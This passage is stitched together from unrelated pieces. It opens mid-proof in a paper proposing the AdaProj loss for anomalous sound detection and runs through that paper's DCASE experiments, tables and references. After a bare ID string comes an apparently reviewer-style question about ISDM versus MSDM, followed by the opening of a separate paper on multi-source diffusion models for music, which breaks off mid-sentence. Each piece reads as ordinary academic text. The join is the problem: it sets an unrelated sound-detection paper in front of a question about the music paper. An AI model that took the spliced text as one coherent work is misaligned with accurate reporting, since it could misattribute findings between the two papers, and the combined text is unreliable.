\sum_{j=1}^{J} \langle x, c_j \rangle c_j = P_C(x). \] Hence, \[ \|P_C(x)\|_2 = \|x\|_2 = 1 \quad \text{as well as } \langle x, P_{\text{span}(C)}(x) \rangle = \langle x, x \rangle = \|x\|_2^2 = 1 \] and we obtain \[ \|P_{S^{D-1}}(x) - P_{S^{D-1}}(P_{\text{span}(C)}(x))\|^2_2 = \langle P_{S^{D-1}}(x) - P_{S^{D-1}}(P_{\text{span}(C)}(x)), P_{S^{D-1}}(x) - P_{S^{D-1}}(P_{\text{span}(C)}(x)) \rangle \] \[ = \|P_{S^{D-1}}(x)\|^2 - 2\langle P_{S^{D-1}}(x), P_{S^{D-1}}(P_{\text{span}(C)}(x)) \rangle + \|P_{S^{D-1}}(P_{\text{span}(C)}(x))\|^2 \] \[ = 1 - 2 \frac{\langle x, P_{\text{span}(C)}(x) \rangle}{\|x\|_2 \|P_{\text{span}(C)}(x)\|_2} + 1 = 0. \] Remark. If \( C \) contains randomly initialized elements of the unit sphere and \( D \) is sufficiently large, then the elements of \( C \) are approximately pairwise orthonormal with very high probability (Gorban et al., 2016). Hence, this Lemma is likely to hold for the AdaProj loss. When inserting the projection onto the \( D - 1 \)-sphere as an operation into the neural network, this Lemma shows that the solution space for the AdaProj loss function is increased to the whole subspace \( \text{span}(C) \), which has a dimension of \( |C| \) with very high probability. Because of this, it should be ensured that \( |C| < D \). Otherwise the whole embedding space may be an optimal solution and thus the network cannot learn a meaningful embedding space. In comparison, for the AdaCos loss only the class centers themselves are optimal solutions and for the sub-cluster AdaCos loss each sub-cluster is an optimal solution (Wilkinghoff & Kurth, 2023). ### 3 EXPERIMENTAL RESULTS To experimentally evaluate the proposed AdaProj loss, first the experimental setup is presented by describing the datasets and the ASD system. After that, experimental results regarding the performance obtained with different loss functions, the impact of the subspace dimension and the relation to state-of-the-art systems are presented and discussed. #### 3.1 DATASETS AND PERFORMANCE METRICS For the experiments, two ASD datasets, namely the DCASE2022 ASD dataset (Dohi et al., 2022a) and the DCASE2023 ASD dataset (Dohi et al., 2023) for semi-supervised machine condition monitoring, were used. Both datasets consist of a development set and an evaluation set that are divided into a training split containing only normal data and a test split containing normal as well as anomalous data. Furthermore, both tasks explicitly capture the problem of domain generalization (Wang et al., 2021) by defining a source and a target domain, which differs from the source domain by altering machine parameters or noise conditions. The task is to detect anomalous samples regardless of the domain a sample belongs to by training a system with only normal data. As meta information, the target machine type of each sample is known and for the training samples, also the domain and additional parameter settings or noise conditions, called attribute information, are known and thus can be utilized to train an embedding model. The DCASE2022 ASD dataset (Dohi et al., 2022a) consists of the machine types “ToyCar” and “ToyTrain” from ToyAdmos2 (Harada et al., 2021) and “fan”, “gearbox”, “bearing”, “slide rail” and “valve” from MIMII-DG (Dohi et al., 2022b). For each machine type, there are six different so-called sections, indicating different machine IDs of these types of which three belong to the development set and three belong to the test set. These IDs are known for each recording and can also be utilized as meta information to train the system. For the source domain of each section, there are 1000 normal audio recordings with a duration of 10 s with a sampling rate of 16 kHz belonging to the training split and 50 normal and 50 anomalous samples belonging to the test split. For the target domain of each section, there are also approximately 50 normal and 50 anomalous samples belonging to the test split but only 10 normal audio recordings belonging to the training split. The DCASE2023 ASD dataset (Dohi et al., 2023) is similar to the DCASE2022 ASD dataset with the following modifications. First of all, the development set and the evaluation set contain mutually exclusive machine types. More concretely, the development set contains the same machine types as the DCASE2022 dataset and the evaluation set contains the machine types “ToyTank”, “ToyNscale” and “ToyDrone” from ToyAdmos2+ (Harada et al., 2023b) and “vacuum”, “bandsaw”, “grinder” and “shaker” from MIMII-DG (Dohi et al., 2022b). Furthermore, there is only a single section for each machine type, which makes the auxiliary classification task much easier resulting in less informative embeddings for the ASD task. Last but not least, the duration of each recording has a length between 6 s and 18 s. Overall, all three modifications make this task much more challenging than the DCASE2022 ASD task. To measure the performance of the ASD systems the threshold-independent area under the receiver operating characteristic (ROC) curve (AUC) metric is used. In addition, the partial area under the ROC curve (pAUC) (McClish, 1989), which is the AUC for low false positive rates ranging from 0 to $p = 0.1$ in this case, is used. The reason for incorporating the pAUC is that, for machine condition monitoring, one is interested in ensuring a low false alarm rate to not lose the trust of users in taking alarms seriously. Both performance metrics are computed domain-independent for every previously defined section of the dataset and the harmonic mean of all resulting values is the final score used to measure and compare the performances of different ASD systems. ### 3.2 ANOMALOUS SOUND DETECTION SYSTEM For all experiments conducted in this work, the state-of-the-art ASD system presented in Wilkinghoff (2023a) is used. An overview of the system can be found in Figure 1. The system consists of three main components: 1) a feature extractor, 2) an embedding model and 3) a backend for computing anomaly scores. In the first processing block, two different feature representations are extracted from the raw waveforms, namely magnitude spectrograms and the full magnitude spectrum. To make both feature representations a bit more different the temporal mean is subtracted from the magnitude spectrograms, essentially removing static frequency information that are captured with the highest possible resolution in the magnitude spectrums. Utilizing both of these representations was shown to significantly improve the performance (Wilkinghoff, 2023a) despite their close relation. For each of the two feature representations, another convolutional subnetwork is trained and the resulting embeddings are concatenated and normalized with respect to the Euclidean norm to obtain a single embedding. In contrast to the original architecture, the embedding dimension is doubled from 256 to 512. More details about the subnetwork architectures can be found in Wilkinghoff (2023a). The network is trained for 10 epochs using a batch size of 64 using adam (Kingma & Ba, 2015) by utilizing meta information such as machine types and the provided attribute information as an auxiliary classification task. Different loss functions can be used for this purpose and will be compared in the next subsection. All loss functions investigated in this work require class-specific center vectors, which are initialized randomly using Glorot uniform initialization (Glorot & Bengio, 2010). To improve the resulting ASD performance, the randomly initialized class centers are not adapted during training and no bias terms are used as proposed in Ruff et al. (2018) for deep one-class classification. Furthermore, mixup (Zhang et al., 2018) with a uniformly distributed mixing coefficient is applied to the waveforms. As a backend, k-means with 32 means is applied to the normal training samples of the source domain. For a given test sample, the smallest cosine distance to these means and the ten normal Table 1: ASD performance obtained with different loss functions. Harmonic means of all AUCs and pAUCs over all pre-defined sections of the dataset are depicted in percent. Arithmetic mean and standard deviation of the results over ten independent trials are shown. Best results in each column are highlighted with bold letters. | DCASE2022 development set | Dohi et al., 2022a | |---------------------------|-------------------| | **loss function** | source domain | target domain | domain-independent | | | AUC | pAUC | AUC | pAUC | AUC | pAUC | | intra-class (IC) compactness loss (Ruff et al., 2018) | 81.8 ± 1.6 | 74.9 ± 1.7 | 75.3 ± 1.0 | 63.4 ± 0.6 | 79.2 ± 0.9 | 64.7 ± 1.1 | | IC compactness loss + CCE (Perera & Patel, 2019) | 82.5 ± 1.8 | 75.5 ± 0.9 | 75.5 ± 0.7 | 61.6 ± 0.9 | 79.0 ± 0.8 | 65.0 ± 0.7 | | AdaCos loss (Zhang et al., 2019) | 82.6 ± 1.4 | 76.0 ± 1.1 | 76.5 ± 1.2 | 62.3 ± 1.4 | 79.8 ± 0.7 | 65.5 ± 0.9 | | sub-cluster AdaCos loss (Wilkinghoff, 2021) | 83.2 ± 2.1 | 75.9 ± 1.3 | 77.6 ± 1.0 | 62.1 ± 1.5 | 80.0 ± 1.4 | 65.2 ± 1.1 | | proposed AdaProj loss | **84.3 ± 1.1** | **76.3 ± 1.1** | **77.2 ± 1.2** | **62.2 ± 1.1** | **80.6 ± 0.8** | **65.5 ± 1.3** | | DCASE2022 evaluation set | Dohi et al., 2022a | |--------------------------|--------------------| | **loss function** | source domain | target domain | domain-independent | | | AUC | pAUC | AUC | pAUC | AUC | pAUC | | IC compactness loss (Ruff et al., 2018) | 74.7 ± 0.9 | 64.2 ± 1.3 | 65.9 ± 0.8 | 57.8 ± 0.9 | 70.3 ± 0.8 | 58.9 ± 0.8 | | IC compactness loss + CCE (Perera & Patel, 2019) | 75.6 ± 0.7 | 66.9 ± 0.8 | 69.3 ± 0.7 | 59.3 ± 0.7 | 72.6 ± 0.4 | 60.3 ± 0.7 | | AdaCos loss (Zhang et al., 2019) | 77.2 ± 0.5 | 65.9 ± 1.4 | 68.6 ± 1.1 | 58.6 ± 0.7 | 73.0 ± 0.4 | 59.7 ± 0.6 | | sub-cluster AdaCos loss (Wilkinghoff, 2021) | 77.0 ± 0.7 | 66.5 ± 0.9 | 68.3 ± 0.8 | 58.8 ± 0.6 | 72.9 ± 0.6 | 59.5 ± 0.5 | | proposed AdaProj loss | **77.4 ± 1.0** | **67.0 ± 0.6** | **69.7 ± 0.6** | **59.6 ± 0.6** | **73.6 ± 0.7** | **60.5 ± 0.7** | | DCASE2023 development set | Dohi et al., 2023 | |---------------------------|-------------------| | **loss** | source domain | target domain | domain-independent | | | AUC | pAUC | AUC | pAUC | AUC | pAUC | | IC compactness loss (Ruff et al., 2018) | 67.0 ± 2.1 | 62.4 ± 1.0 | 69.1 ± 1.4 | **56.4 ± 1.1** | 67.7 ± 1.2 | 56.9 ± 0.9 | | IC compactness loss + CCE (Perera & Patel, 2019) | 70.6 ± 1.8 | 64.9 ± 1.8 | 71.2 ± 1.4 | 55.5 ± 1.6 | 70.4 ± 1.0 | **57.4 ± 1.1** | | AdaCos loss (Zhang et al., 2019) | 70.7 ± 1.3 | 64.3 ± 1.1 | 71.2 ± 1.1 | 55.4 ± 1.3 | 70.9 ± 0.9 | 56.8 ± 0.9 | | sub-cluster AdaCos loss (Wilkinghoff, 2021) | 68.5 ± 1.7 | 62.0 ± 1.3 | 67.8 ± 1.5 | 53.9 ± 1.5 | 70.4 ± 0.9 | 56.3 ± 0.8 | | proposed AdaProj loss | 70.3 ± 1.7 | 61.8 ± 1.6 | **72.2 ± 1.4** | 55.1 ± 1.1 | **71.4 ± 1.0** | 56.2 ± 0.7 | | DCASE2023 evaluation set | Dohi et al., 2023 | |--------------------------|--------------------| | **loss** | source domain | target domain | domain-independent | | | AUC | pAUC | AUC | pAUC | AUC | pAUC | | IC compactness loss (Ruff et al., 2018) | 73.5 ± 1.8 | 63.4 ± 1.8 | 58.8 ± 2.5 | 55.7 ± 1.3 | 64.0 ± 1.5 | 55.8 ± 0.9 | | IC compactness loss + CCE (Perera & Patel, 2019) | 74.3 ± 1.5 | **64.0 ± 1.6** | 61.6 ± 2.0 | 55.7 ± 0.9 | 67.5 ± 0.8 | 57.5 ± 1.0 | | AdaCos loss (Zhang et al., 2019) | **74.7 ± 1.5** | 63.8 ± 1.8 | 61.6 ± 3.4 | 57.1 ± 1.4 | 68.0 ± 1.6 | 58.0 ± 1.1 | | sub-cluster AdaCos loss (Wilkinghoff, 2021) | 73.2 ± 1.9 | 61.6 ± 1.4 | 62.0 ± 2.2 | 55.8 ± 1.3 | 66.5 ± 1.6 | 56.2 ± 1.0 | | proposed AdaProj loss | 74.2 ± 1.8 | 62.9 ± 1.0 | **64.4 ± 2.0** | **57.7 ± 0.8** | **69.8 ± 1.3** | **60.0 ± 0.5** | | arithmetic mean over all datasets | |-----------------------------------| | **loss** | source domain | target domain | domain-independent | | | AUC | pAUC | AUC | pAUC | AUC | pAUC | | IC compactness loss (Ruff et al., 2018) | 74.3 | 66.2 | 67.3 | 58.3 | 70.3 | 59.1 | | IC compactness loss + CCE (Perera & Patel, 2019) | 75.8 | **67.6** | 69.4 | 58.0 | 72.4 | 60.1 | | AdaCos loss (Zhang et al., 2019) | 76.3 | 67.5 | 69.5 | 58.4 | 72.9 | 60.0 | | sub-cluster AdaCos loss (Wilkinghoff, 2021) | 75.4 | 66.5 | 69.9 | 58.1 | 72.5 | 59.3 | | proposed AdaProj loss | **76.6** | 66.3 | **70.9** | **58.7** | **73.9** | **60.6** | training samples of the target domain is used as an anomaly score. Thus, smaller values indicate normal samples whereas higher values indicate anomalous samples. ### 3.3 Performance Evaluation The first and most important experiment is to compare different loss functions for training the embedding extractor of the ASD system presented in the previous subsection. For this purpose, we used 1) individual class-specific IC compactness losses jointly trained on all classes, as proposed for one-class classification in Ruff et al. (2018), 2) an additional discriminative CCE loss, similar to the discriminativeness loss used in Perera & Patel (2019) but trained on the same dataset, 3) the AdaCos loss (Zhang et al., 2019), 4) the sub-cluster AdaCos loss (Wilkinghoff, 2021) with 32 sub-clusters and 5) the proposed AdaProj loss. The experiments were conducted on the development and evaluation split of the DCASE2022 and the DCASE2023 ASD dataset and each experiment was repeated ten times to reduce the variance of the resulting performances. Furthermore, the arithmetic means of the performances obtained on the different datasets are shown to be able to directly compare the overall performance. The results can be found in Table 1. The main observation to be made is that the proposed AdaProj loss clearly outperforms all other losses on both datasets. Especially on the DCASE2023 dataset, there are significant improvements to be observed. The most likely explanation is that for this dataset the classification task is less difficult and thus a few classes may be easily identified leading to embeddings that do not carry enough information to distinguish between embeddings belonging to normal and anomalous samples of these classes. Another interesting observation is that, in contrast to the original results presented in Wilkinghoff (2021), the sub-cluster AdaCos loss actually performs slightly worse than the AdaCos loss despite having a higher solution space. A possible explanation is that in this work, the centers are adapted during training whereas, in our work, they are not as this has been shown to improve the resulting performance (Wilkinghoff, 2023a). Since all centers have approximately the same distance to each other when being randomly initialized, i.e., the centers belonging to a target class and the other centers, the network will likely utilize only a single center for each class that is closest to the initial embeddings of the corresponding target class. Moreover, a low inter-class similarity is more difficult to ensure due to the higher total number of sub-clusters belonging to other classes. This leads to more restrictive requirements when learning class-specific distributions and thus actually reduces the ability to differentiate between embeddings belonging to normal and anomalous samples. ### 3.4 Investigating the Impact of the Subspace Dimension on the Performance As an ablation study, different choices for the dimension of the subspaces have been compared experimentally on the DCASE2023 ASD dataset. The results can be found in Figure 2. It can be seen, that, on the development set, the results are relatively stable while a larger dimension slightly improves the performance on the evaluation set without any significant differences. For subspace dimensions greater than 48 the performances seem to slightly degrade again. In conclusion, the subspace dimension should be neither too high nor too low and a dimension of 32 as used for the other experiments in this works appears to be a reasonable choice. ### 3.5 Comparison to Other Published Systems As a last experiment, the performance of the proposed system using AdaProj is compared to the ten top-performing systems of the DCASE2023 Challenge. As many systems utilize ensembles of models, the mean of the anomaly scores belonging to ten independent trials was used to create an ensemble of ten systems allowing a fair comparison. The results can be found in Figure 3. It can be seen that the proposed system outperforms all other published systems and thus achieves a new state-of-the-art performance. This adds confidence to the benefits of the AdaProj loss function. 4 CONCLUSIONS AND FUTURE WORK In this work, AdaProj a novel angular margin loss function specifically designed for semi-supervised anomaly detection with auxiliary classification tasks was presented. It was proven that this loss function learns an embedding space with class-specific subspaces of arbitrary dimension. In contrast to other angular margin losses, which try to project data to individual points in space, this relaxes the requirements of solving the classification task and allows for less compact distributions in the embedding space. In experiments conducted on the DCASE2022 and DCASE2023 ASD datasets, it was shown that using AdaProj results in better performance than other commonly used loss functions. In conclusion, the resulting embedding space has a more desirable structure than the other embedding spaces for differentiating between normal and anomalous samples. As a result, a new state-of-the-art performance outperforming all other published systems could be achieved on the DCASE2023 ASD dataset. For future work, it is planned to evaluate AdaProj on other datasets and using other auxiliary classification tasks, e.g. tasks imposed by SSL. REFERENCES Charu Aggarwal. Outlier Analysis. Springer, 2nd edition, 2017. Han Chen, Yan Song, Zhu Zhuo, Yu Zhou, Yu-Hong Li, Hui Xue, and Ian McLoughlin. An effective anomalous sound detection method based on representation learning with simulated anomalies. In International Conference on Acoustics, Speech and Signal Processing (ICASSP). IEEE, 2023. Jiankang Deng, Jia Guo, Niannan Xue, and Stefanos Zafeiriou. ArcFace: Additive angular margin loss for deep face recognition. In Conference on Computer Vision and Pattern Recognition (CVPR), pp. 4690–4699. IEEE, 2019. Yufeng Deng, Anbai Jiang, Yuchen Duan, Jitao Ma, Xuchu Chen, Jia Liu, Pingyi Fan, Cheng Lu, and Wei-Qiang Zhang. Ensemble of multiple anomalous sound detectors. In 7th Workshop on Detection and Classification of Acoustic Scenes and Events (DCASE). Tampere University, 2022. Kota Dohi, Keisuke Imoto, Noboru Harada, Daisuke Niizumi, Yuma Koizumi, Tomoya Nishida, Harsh Purohit, Ryo Tanabe, Takashi Endo, Masaaki Yamamoto, and Yohei Kawaguchi. Description and discussion on DCASE 2022 challenge task 2: Unsupervised anomalous sound detection for machine condition monitoring applying domain generalization techniques. In 7th Workshop on Detection and Classification of Acoustic Scenes and Events (DCASE), pp. 26–30. Tampere University, 2022a. Kota Dohi, Tomoya Nishida, Harsh Purohit, Ryo Tanabe, Takashi Endo, Masaaki Yamamoto, Yuki Nikaido, and Yohei Kawaguchi. MIMII DG: sound dataset for malfunctioning industrial machine investigation and inspection for domain generalization task. In *7th Workshop on Detection and Classification of Acoustic Scenes and Events 2020 (DCASE)*, pp. 26–30. Tampere University, 2022b. Kota Dohi, Keisuke Imoto, Noboru Harada, Daisuke Niizumi, Yuma Koizumi, Tomoya Nishida, Harsh Purohit, Ryo Tanabe, Takashi Endo, and Yohei Kawaguchi. Description and discussion on DCASE 2023 challenge task 2: First-shot unsupervised anomalous sound detection for machine condition monitoring. In *8th Detection and Classification of Acoustic Scenes and Events Workshop (DCASE)*, pp. 31–35. Tampere University, 2023. Ritwik Giri, Srikanth V. Tenneti, Fangzhou Cheng, Karim Helwani, Umut Isik, and Arvindh Krishnaswamy. Self-supervised classification for detecting anomalous sounds. In *Detection and Classification of Acoustic Scenes and Events Workshop (DCASE)*, pp. 46–50, 2020. Xavier Glorot and Yoshua Bengio. Understanding the difficulty of training deep feedforward neural networks. In *Thirteenth International Conference on Artificial Intelligence and Statistics (AISTATS)*, volume 9 of *JMLR Proceedings*, pp. 249–256. JMLR.org, 2010. Alexander N. Gorban, Ivan Yu. Tyukin, Danil V. Prokhorov, and Konstantin I. Sofeikov. Approximation with random bases: Pro et contra. *Information Sciences*, 364-365:129–145, 2016. Noboru Harada, Daisuke Niizumi, Daiki Takeuchi, Yasunori Ohishi, Masahiro Yasuda, and Shoichiro Saito. ToyADMOS2: Another dataset of miniature-machine operating sounds for anomalous sound detection under domain shift conditions. In *6th Workshop on Detection and Classification of Acoustic Scenes and Events 2020 (DCASE)*, pp. 1–5, 2021. Noboru Harada, Daisuke Niizumi, Daiki Takeuchi, Yasunori Ohishi, and Masahiro Yasuda. First-shot anomaly detection for machine condition monitoring: A domain generalization baseline. In *31st European Signal Processing Conference EUSIPCO*. IEEE, 2023a. Noboru Harada, Daisuke Niizumi, Daiki Takeuchi, Yasunori Ohishi, and Masahiro Yasuda. ToyADMOS2+: New toyadmos data and benchmark results of the first-shot anomalous sound event detection baseline. In *8th Detection and Classification of Acoustic Scenes and Events Workshop (DCASE)*, pp. 41–45. Tampere University, 2023b. Dan Hendrycks, Mantas Mazeika, and Thomas G. Dietterich. Deep anomaly detection with outlier exposure. In *7th International Conference on Learning Representations, (ICLR)*. OpenReview.net, 2019. Tadanobu Inoue, Phongtharin Vinayavekhin, Shu Morikuni, Shiqiang Wang, Tuan Hoang Trong, David Wood, Michiaki Tatsubori, and Ryuki Tachibana. Detection of anomalous sounds for machine condition monitoring using classification confidence. In *5th Detection and Classification of Acoustic Scenes and Events Workshop (DCASE)*, pp. 66–70, 2020. Sergey Ioffe and Christian Szegedy. Batch normalization: Accelerating deep network training by reducing internal covariate shift. In *32nd International Conference on Machine Learning (ICML)*, volume 37, pp. 448–456, 2015. Wang JiaJun. Self-supervised representation learning for first-shot unsupervised anomalous sound detection. Technical report, DCASE2023 Challenge, June 2023. Anbai Jiang, Qijun Hou, Jia Liu, Pingyi Fan, Jitao Ma, Cheng Lu, Yuanzhi Zhai, Yufeng Deng, and Wei-Qiang Zhang. Thuee system for first-shot unsupervised anomalous sound detection for machine condition monitoring. Technical report, DCASE2023 Challenge, 2023. Wang Junjie, Wang Jiajun, Chen Shengbing, Sun Yong, and Liu Mengyuan. Anomalous sound detection based on self-supervised learning. Technical report, DCASE2023 Challenge, 2023. Yohei Kawaguchi, Keisuke Imoto, Yuma Koizumi, Noboru Harada, Daisuke Niizumi, Kota Dohi, Ryo Tanabe, Harsh Purohit, and Takashi Endo. Description and discussion on DCASE 2021 challenge task 2: Unsupervised anomalous detection for machine condition monitoring under domain shifted conditions. In *Detection and Classification of Acoustic Scenes and Events Workshop (DCASE)*, pp. 186–190, 2021. Diederik P. Kingma and Jimmy Ba. Adam: A method for stochastic optimization. In Yoshua Bengio and Yann LeCun (eds.), *3rd International Conference on Learning Representations (ICLR)*, 2015. Yuma Koizumi, Yohei Kawaguchi, Keisuke Imoto, Toshiki Nakamura, Yuki Nikaido, Ryo Tanabe, Harsh Purohit, Kaori Suefusa, Takashi Endo, Masahiro Yasuda, and Noboru Harada. Description and discussion on DCASE2020 challenge task2: Unsupervised anomalous sound detection for machine condition monitoring. In *5th Detection and Classification of Acoustic Scenes and Events Workshop (DCASE)*, pp. 81–85, 2020. Ibuki Kuroyanagi, Tomoki Hayashi, Yusuke Adachi, Takenori Yoshimura, Kazuya Takeda, and Tomoki Toda. An ensemble approach to anomalous sound detection based on conformer-based autoencoder and binary classifier incorporated with metric learning. In *6th Workshop on Detection and Classification of Acoustic Scenes and Events (DCASE)*, pp. 110–114, 2021. Lijian Li, Yunhe Zhang, and Aiping Huang. Learnable subspace orthogonal projection for semi-supervised image classification. In *16th Asian Conference on Computer Vision (ACCV)*, volume 13843 of *Lecture Notes in Computer Science*, pp. 477–490. Springer, 2022. Jose A. Lopez, Hong Lu, Paulo Lopez-Meyer, Lama Nachman, Georg Stemmer, and Jonathan Huang. A speaker recognition approach to anomaly detection. In *5th Detection and Classification of Acoustic Scenes and Events Workshop (DCASE)*, pp. 96–99, 2020. Jose A. Lopez, Georg Stemmer, Paulo Lopez-Meyer, Pradyumna Singh, Juan A. del Hoyo Ontiveros, and Héctor A. Cordourier. Ensemble of complementary anomaly detectors under domain shifted conditions. In *6th Workshop on Detection and Classification of Acoustic Scenes and Events (DCASE)*, pp. 11–15, 2021. Zhiqiang Lv, Bing Han, Zhengyang Chen, Yanmin Qian, Jiawei Ding, and Jia Liu. Unsupervised anomalous detection based on unsupervised pretrained models. Technical report, DCASE2023 Challenge, 2023. Donna Katzman McClish. Analyzing a portion of the ROC curve. *Medical decision making*, 9(3): 190–195, 1989. Tomoya Nishida, Kota Dohi, Takashi Endo, Masaaki Yamamoto, and Yohei Kawaguchi. Anomalous sound detection based on machine activity detection. In *30th European Signal Processing Conference EUSIPCO*, pp. 269–273. IEEE, 2022. Pramuditha Perera and Vishal M. Patel. Learning deep features for one-class classification. *IEEE Transactions on Image Processing*, 28(11):5450–5463, 2019. Paul Primus, Verena Haunschmid, Patrick Praher, and Gerhard Widmer. Anomalous sound detection as a simple binary classification problem with careful selection of proxy outlier examples. In *5th Workshop on Detection and Classification of Acoustic Scenes and Events 2020 (DCASE)*, pp. 170–174, 2020. Lukas Ruff, Nico Görnitz, Lucas Deecke, Shoaib Ahmed Siddiqui, Robert A. Vandermeulen, Alexander Binder, Emmanuel Müller, and Marius Kloft. Deep one-class classification. In *35th International Conference on Machine Learning (ICML)*, volume 80 of *Proceedings of Machine Learning Research*, pp. 4390–4399. PMLR, 2018. Jiantong Tian, Hejing Zhang, Qiaoxi Zhu, Feiyang Xiao, Haohe Liu, Xinhao Mei, Youde Liu, Wenwu Wang, and Jian Guan. First-shot anomalous sound detection with gmm clustering and finetuned attribute classification using audio pretrained model. Technical report, DCASE2023 Challenge, 2023. Satvik Venkatesh, Gordon Wichern, Aswin Shanmugam Subramanian, and Jonathan Le Roux. Improved domain generalization via disentangled multi-task learning in unsupervised anomalous sound detection. In *7th Workshop on Detection and Classification of Acoustic Scenes and Events (DCASE)*, pp. 196–200. Tampere University, 2022. Feng Wang, Jian Cheng, Weiyang Liu, and Haijun Liu. Additive margin softmax for face verification. *IEEE Signal Processing Letters*, 25(7):926–930, 2018.
h922Qhkmx1
Q1: The separation result of ISDM and MSDM in Table 2 suggests a trade-off in terms of generation quality and separation performance. Is it confirmed? If so, why using a unified approach for source separation and generation? I understand on one hand, ISDM helps to show the diffusion method is comparable to the SOTA method. However, since MSDM is always lower than ISDM, I doubt the fundamental assumption in this paper is not valid that it is superior to use joint distribution to model generation and separation at the same time.
MULTI-SOURCE DIFFUSION MODELS FOR SIMULTANEOUS MUSIC GENERATION AND SEPARATION Giorgio Mariani∗ Sapienza University of Rome [email protected] Emilian Postolache∗ Sapienza University of Rome [email protected] Luca Cosmo† Ca’ Foscari University of Venice [email protected] Irene Tallini∗ Sapienza University of Rome [email protected] Michele Mancusi∗ Sapienza University of Rome [email protected] Emanuele Rodolà† Sapienza University of Rome [email protected] ABSTRACT In this work, we define a diffusion-based generative model capable of both music synthesis and source separation by learning the score of the joint probability density of sources sharing a context. Alongside the classic total inference tasks (i.e., generating a mixture, separating the sources), we also introduce and experiment on the partial generation task of source imputation, where we generate a subset of the sources given the others (e.g., play a piano track that goes well with the drums). Additionally, we introduce a novel inference method for the separation task based on Dirac likelihood functions. We train our model on Slakh2100, a standard dataset for musical source separation, provide qualitative results in the generation settings, and showcase competitive quantitative results in the source separation setting. Our method is the first example of a single model that can handle both generation and separation tasks, thus representing a step toward general audio models. 1 INTRODUCTION Generative models have recently gained much attention thanks to their successful application in many fields, such as NLP [OpenAI, 2023; Touvron et al., 2023; Santilli et al., 2023], image synthesis [Ramesh et al., 2022; Rombach et al., 2022] or protein design [Shin et al., 2021; Weiss et al., 2023; Minello et al., 2024]. Audio is no exception to this trend [Agostinelli et al., 2023; Liu et al., 2023]. A peculiarity of the audio domain is that an audio sample $y$ can be seen as the sum of multiple individual sources $\{x_1, \ldots, x_N\}$, resulting in a mixture $y = \sum_{n=1}^{N} x_n$. Unlike in other sub-fields of the audio domain (e.g., speech), sources present in musical mixtures (stems) share a context given their strong interdependence. For example, the bass line of a song follows the drum’s rhythm and ∗Equal contribution. Listing order is random. G.M. wrote most of the code, performed most objective experiments, and contributed to the development of the Dirac separator. I.T. proposed and developed the idea of the Dirac separator and partly formalized its proof, contributed to the code and the objective experiments, especially concerning the Dirac separator, performed the subjective listening tests, and wrote substantial parts of the paper. E.P. proposed and developed the ideas of the source-joint Bayesian separator and the sub-FAD metric, partly formalized the proof of the Dirac separator, contributed to the code and the objective experiments, especially concerning source imputation, and wrote substantial parts of the paper. M.M. proposed the idea of using the source-joint model for music (and accompaniment) generation, proposed using the correction steps, and contributed to the objective experiments. †Shared last authorship. harmonizes with the melody of the guitar. Mathematically, this fact can be expressed by saying that the joint distribution of the sources \( p(x_1, \ldots, x_N) \) does not factorize into the product of individual source distributions \( \{p_n(x_n)\}_{n=1,\ldots,N} \). Knowing the joint \( p(x_1, \ldots, x_N) \) implies knowing the distribution over the mixtures \( p(y) \) since the latter can be obtained through the sum. The converse is more difficult mathematically, being an inverse problem. Nevertheless, humans have developed the ability to process multiple sound sources simultaneously in terms of synthesis (i.e., musical composition or generation) and analysis (i.e., source separation). More specifically, composers can invent multiple sources \( \{x_1, \ldots, x_N\} \) that sum to a consistent mixture \( y \) and, extract information about the individual sources \( \{x_1, \ldots, x_N\} \) from a mixture \( y \). This ability to compose and decompose sound is crucial for a generative music model. A model designed to assist in music composition should be capable of isolating individual sources within a mixture and allow for independent operation on each source. Such a capability would give the composer maximum control over what to modify and retain in a composition. Therefore, we argue that compositional (waveform) music generation is highly connected to music source separation. To our knowledge, no model in deep learning literature can perform both tasks simultaneously. Models designed for the generation task directly learn the distribution \( p(y) \) over mixtures, collapsing the information needed for the separation task. In this case, we have accurate mixture modeling but no information about the individual sources. It is worth noting that approaches that model the distribution of mixtures conditioning on textual data (Schneider et al., 2023; Agostinelli et al., 2023) face the same limitations. Conversely, models for source separation (Defossez et al., 2019) either target \( p(x_1, \ldots, x_N | y) \), conditioning on the mixture, or learn a single model \( p_n(x_n) \) for each source distribution (e.g., in a weakly-supervised manner) and condition on the mixture during inference (Jayaram & Thickstun, 2020; Postolache et al., 2023a). In both cases, generating mixtures is impossible. In the first case, the model inputs a mixture, which hinders the possibility of unconditional modeling, not having direct access to \( p(x_1, \ldots, x_N) \) (or equivalently to \( p(y) \)). In the second case, while we can accurately model each source independently, all essential information about their interdependence is lost, preventing the possibility of generating coherent mixtures. **Contribution.** Our contribution is three-fold. (i) First, we bridge the gap between source separation and music generation by learning \( p(x_1, \ldots, x_N) \), the joint (prior) distribution of contextual sources (i.e., those belonging to the same song). For this purpose, we use the denoising score-matching framework to train a Multi-Source Diffusion Model (MSDM). We can perform both source separation and music generation during inference by training this single model. Specifically, generation is achieved by sampling from the prior, while separation is carried out by conditioning the prior on the mixture and then sampling from the resulting posterior distribution. (ii) This new formulation opens the doors to novel tasks in the generative domain, such as source imputation, where we create accompaniments by generating a subset of the sources given the others (e.g., play a piano track that goes well with the drums). (iii) Lastly, to obtain competitive results on source separation with respect to state-of-the-art regressor models (Manilow et al., 2022) on the Slakh2100 (Manilow et al., 2019) dataset, we propose a new procedure for computing the posterior score based on Dirac delta functions, exploiting the functional relationship between the sources and the mixture. 2 RELATED WORK 2.1 GENERATIVE MODELS FOR AUDIO Deep generative models for audio learn, directly or implicitly, the distribution of mixtures, represented in our notation by \( p(y) \), possibly conditioning on additional data such as text. Various general-purpose generative models, such as autoregressive models, GANs (Donahue et al., 2019), and diffusion models, have been adapted for use in the audio field. Autoregressive models are well-established in audio modeling (van den Oord et al., 2016). Jukebox (Dhariwal et al., 2020) proposed to model musical tracks with Scalable Transformers (Vaswani et al., 2017) on hierarchical discrete representations obtained through VQ-VAEs (van den Oord et al., 2017). Furthermore, using a lyrics conditioner, this method generated tracks with vocals following the text. However, while Jukebox could model longer sequences in latent space, the audio output suffered from quantization artifacts. Newer latent autoregressive models (Borsos et al., 2023; Kreuk et al., 2023) can handle extended contexts, more coherent generations and, by incorporating residual quantization (Zeghidour et al., 2021), output more naturally sounding samples. State-of-the-art latent autoregressive models for music, such as MusicLM (Agostinelli et al., 2023), can guide generation by conditioning on textual embeddings obtained via large-scale contrastive pre-training (Manco et al., 2022; Huang et al., 2022). MusicLM can also input a melody and condition on text for style transfer. A concurrent work, SingSong (Donahue et al., 2023), introduces vocal-to-mixture accompaniment generation. Our accompaniment generation procedure differs from the latter since we perform generation at the stem level in a composable way, while the former outputs a single mixture. DiffWave (Kong et al., 2021) and WaveGrad (Chen et al., 2021) were the 